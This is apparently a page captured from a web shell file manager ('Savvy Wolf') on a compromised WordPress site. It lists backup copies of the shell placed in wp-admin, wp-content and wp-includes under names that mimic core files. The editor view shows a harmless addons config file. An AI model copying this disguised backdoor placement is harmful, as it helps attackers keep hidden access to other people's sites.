Backups Created:
/home/falconag/public_html/wp-admin/admin-wolf.php
/home/falconag/public_html/wp-content/edit-wolf.php
/home/falconag/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: addons.php
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Addons configuration * * @filter us_config_addons */ foreach ( $config as $key => $addon ) { if ( $addon['name'] == 'The Events Calendar' ) { unset( $config[$key] ); } } return $config;